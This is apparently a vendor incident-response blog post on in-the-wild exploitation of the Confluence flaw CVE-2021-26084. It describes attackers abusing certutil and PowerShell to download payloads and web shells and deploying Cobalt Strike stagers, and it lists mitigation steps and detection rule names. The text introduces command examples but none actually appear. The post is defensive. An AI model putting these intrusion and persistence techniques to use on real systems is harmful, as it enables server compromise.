Blue Team: A Defensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
Over the past week and during the Labor Day holiday weekend, the BlackBerry Incident Response (IR) team has seen an increase in confirmed exploitation of the recently disclosed Confluence Server and Data Center vulnerability, assigned CVE-2021-26084. This continues a recent trend of critical vulnerabilities affecting external facing systems.
This vulnerability allows attackers to perform pre-authenticated remote code execution (RCE), which means that code can be run on a target device before the victim is logged in. With multiple proof-of-concept (POC) exploits floating around on the Internet, threat actors are scanning the web and dropping payloads as quickly as possible before network defenders have an opportunity to mitigate.
This article will highlight several attacker techniques we are seeing across multiple environments, such as abuse of Certutil and PowerShell to discover information about an infected system and network, and to deploy additional persistence mechanisms.
Most Common Attacker Techniques
While this vulnerability also affects Linux® installations, the incidents that we have seen thus far have been running on Windows®. In these cases, BlackBerry observed the command prompt spawned as a child process of the tomcat9.exe process. By hunting on this parent/child relationship, many related events were identified:
BlackBerry researchers initially found generic system discovery commands being used to enumerate information about the system and network for the impacted host:
Certutil is a legitimate utility used by Windows Certificate Services for the configuration and management of certificates. This tool is also commonly abused by threat actors to perform a variety of malicious activities. Threat actors often select legitimate Windows utilities because they are already present on a victim’s system and are unlikely to be flagged as suspicious – this attacker technique is called “living off the land” (LotL).
In the case of these Confluence exploitation events, certutil was abused to download web shells and executable files. Below is an example of how certutil was used to download a malicious binary file:
BlackBerry also discovered cases of PowerShell being used to download and execute code, scripts, and executable files. Examples of these commands are included below.
Threat actors install backdoors to compromised hosts to prevent the need for re-exploitation. This is done to ensure that they maintain access even after patching occurs.
Because Apache Tomcat can run Java Server Page (JSP) files to execute server-side code on the web server itself, threat actors are abusing this software to install web shells on vulnerable Confluence servers. This allows them to create persistent access to the impacted systems. Examples of how certutil is abused to download web shell files include the following:
In some cases, the threat actor deployed Cobalt Strike stagers to the infected systems to create persistence in memory and stage for additional lateral movement. A partial example of the Cobalt Strike deployment is included below.
Actions to Take
First, check this list to see if you have an on-premise, affected version of Confluence Server or Data Center. If you are running an affected version, the next step is to upgrade to a fixed version if you’re able. If you are not able to upgrade, implement the temporary workaround supplied by Atlassian.
Finally, it’s critical to check for signs of compromise on the Confluence host and surrounding environment. We listed some of the attacker techniques above that should be detected if compromise has occurred. Check the entire file system for any signs of web shells. Note that attackers can use very small web shells such as China Chopper, which can time-match itself to surrounding files to blend in and avoid detection.
BlackBerry Cyber Suite and BlackBerry Guard stop these attacks
If in doubt, call in the experts at BlackBerry to perform forensic analysis and conduct a compromise assessment. BlackBerry customers can feel confident that our AI-driven BlackBerry® Cyber Suite, as well as our Managed Detection & Response (MDR) solution BlackBerry® Guard, are well-equipped to mitigate the risks posed by these continued external-facing vulnerabilities. Core technology includes:
- BlackBerry® Protect provides automated malware prevention, application and script control, memory protection, and device policy enforcement.
- BlackBerry® Optics extends the threat prevention by using BlackBerry Optics Context Analysis Engine (CAE) rules to provide additional telemetry. The following rules were effective at identifying exploitation of the vulnerability:
- Certutil Abuse
- Powershell Download
- Powershell Encoded Command
- One-Liner ML Module
- Account Discovery
Victim of an Attack?
In the unfortunate event that it is too late for prevention and you believe you have already been the victim of an attack, please contact us, regardless of your existing BlackBerry relationship.
The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.
Read our latest blog on this vulnerability: Red Team: An Offensive Perspective on the Confluence Vulnerability (CVE-2021-26084)